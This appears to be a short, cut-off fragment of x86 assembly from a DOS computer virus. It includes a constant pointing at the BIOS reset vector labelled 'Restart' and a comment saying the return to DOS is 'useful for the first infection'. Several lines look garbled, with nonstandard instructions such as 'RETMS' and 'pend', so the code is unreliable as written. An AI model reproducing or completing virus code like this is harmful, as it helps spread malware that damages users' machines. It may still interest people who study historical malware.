DB 0eah
DD 0F000FFF0H; Restart
Form endp
Endit:
RETMS; return DOS, useful for the first infection
pend
